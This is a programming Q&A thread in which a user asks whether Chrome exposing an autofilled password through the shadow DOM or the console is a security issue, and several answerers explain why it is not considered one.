Reputation: 4261
Is this a security issue in Chrome?
SCENARIO 1
I have saved my username and password in Chrome. So when I enter my username then password automatically gets filled. Now, it's obvious that if some else knows my app username, he can login as password is autofilled. But, he should not know the password.
But, I observed that enabling Show user agent shadow DOM in chrome settings reveals my password. (See Image)
SCENARIO 2
Also, I found as part of different scenario, that if I use the following code, then the password is revealed:
<input type="password" name="user[password]" id="user_password">
console.log(user_password.value) // Gives away the password in console
How far this is correct and secure? And what can be done to prevent this?
Upvotes: 0
Views: 118
Answers (4)
Reputation: 571
The security you are relying on in this case is the security of your system. If your system is appropriately secured then you can feel comfortable enabling autocomplete in your browser. This will save you time by storing your passwords locally and they could be retrieved in other ways as well given access to your system. If your system is not secure, then you should not be storing your passwords on it. The fact that the browser "knows" the password that was entered and can return it programmatically is not in itself a security issue.
Better to think in terms of how secure rather than the black and white secure vs security issue. I use autocomplete for Stack Overflow and a number of other websites I am a member of. I do not for my banking or credit card sites. I do not for Amazon, because it has my credit card information stored on it. This is where I draw my lines, your mileage may vary.
:-)
Upvotes: 0
Reputation: 1500
At least its not considered a security issue. A little contradictionary, Web browsers seem to secure themselves against general password revealers as stated here:
Here's some examples for applications that BulletsPassView cannot reveal their passwords:
- Chrome, Firefox, and Opera Web browsers.
Upvotes: 0
Reputation: 343
First we can take the normal typing case(without autocomplete), After we type our password to the browser window, we could see the original password through inspect element.
The autocomplete works same way once the password gets filled to textbox, we could see the original password through inspect element, happens normally. It is not a security issue
And there is no other way to autocomplete the password.. It is fully client side script job.
Upvotes: 0
Reputation: 217
No it's not a security issue at all. Because it is just this that we do with client side scripting. Actually console is showing the password from a web page which is opened in current tab, and if the password is stored in your browser and anyone tries to reveal the password, your system will get prompt for entering master password.
And console doesn't responsible for your concern. It always perform client-side scripting on only current running web page.
So It's not security issue.
Upvotes: 1
Related Questions
- Removing input background colour for Chrome autocomplete?
- How to manually send HTTP POST requests from Firefox or Chrome browser
- Disable same origin policy in Chrome
- How do I get ASP.NET Web API to return JSON instead of XML using Chrome?
- How to get the children of the $(this) selector?
- How to access the correct `this` inside a callback
- Disabling Chrome cache for website development
- Remove blue border from css custom-styled button in Chrome